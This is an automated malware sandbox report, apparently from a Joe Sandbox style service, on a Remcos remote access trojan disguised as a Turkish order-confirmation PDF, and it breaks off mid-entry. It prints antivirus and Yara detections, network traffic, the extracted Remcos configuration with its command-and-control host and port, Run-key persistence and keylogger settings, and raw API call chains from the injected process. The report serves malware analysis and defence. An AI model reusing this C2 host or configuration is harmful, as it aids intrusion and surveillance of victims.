                    Source: 8.3.Eluiezilfw.exe.3adbf00.62.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac6924.78.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac8560.28.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3abe4d0.11.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964348.64.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac3034.54.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964348.65.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964ae4.71.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3968008.21.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad94ec.82.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0000000F.00000002.359362662.0000000004C00000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "Pw`~hustlelord.ddns.net:5017:", "Assigned name": "BIG", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-MZPAVR", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "wikipedia;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "10000"}

                    Exploits

                    Source: Yara match | File source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3ad0000.7.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.2.Eluiezilfw.exe.3b0c37c.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 13.2.Eluiezilfw.exe.3b0c37c.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.395844c.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.2.Eluiezilfw.exe.3ab844c.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 13.2.Eluiezilfw.exe.3c30000.7.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39ac37c.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 13.2.Eluiezilfw.exe.3ab844c.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.2.Eluiezilfw.exe.3c30000.7.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000008.00000002.348456214.0000000003C4C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.315970483.0000000003AEC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000008.00000002.347895283.0000000003AC8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.315787933.0000000003968000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000D.00000002.360606462.0000000003C4C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000D.00000002.360448965.0000000003AC8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe PID: 6356, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: Eluiezilfw.exe PID: 6880, type: MEMORYSTR
                    Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: unknown | HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49716 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49745 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49751 version: TLS 1.2
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basi
c_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,3_2_00404C0A
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,3_2_0040751B
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@st
d@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr3_2_00410586
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,3_2_0040728F
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE3_2_0040477E
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,3_2_00403325
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,3_2_00412BEE
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_10548C1E getenv,FindFirstFileA,FindClose,GetLastError,GetLastError,FindClose,3_2_10548C1E
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_10544CB4 FindFirstFileW,3_2_10544CB4
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_1055457D FindFirstFileW,FindNextFileW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,FindClose,3_2_1055457D
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_1054610D _EH_prolog,socket,connect,_CxxThrowException,FindFirstFileW,_CxxThrowException,FindNextFileW,_CxxThrowException,_CxxThrowException,FindClose,atoi,_CxxThrowException,atoi,FindClose,RtlExitUserThread,3_2_1054610D
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_10546599 FindFirstFileW,FindNextFileW,FindClose,3_2_10546599
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_10548EAA getenv,FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindClose,FindClose,3_2_10548EAA
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_10551F15 FindFirstFileW,3_2_10551F15
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00403C4A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV